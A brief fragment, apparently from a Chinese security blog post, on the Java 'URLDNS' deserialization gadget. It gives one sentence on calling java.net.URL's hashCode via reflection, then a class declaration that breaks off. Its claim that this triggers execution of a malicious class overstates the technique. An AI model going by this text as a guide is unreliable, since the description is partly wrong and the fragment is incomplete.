原理通过反射调用环境自带的类java.net.URL的hashcode方法,去访问URL地址,触发恶意类的执行。
public class URLDNS {
public static void main(String[] args
2025-03-30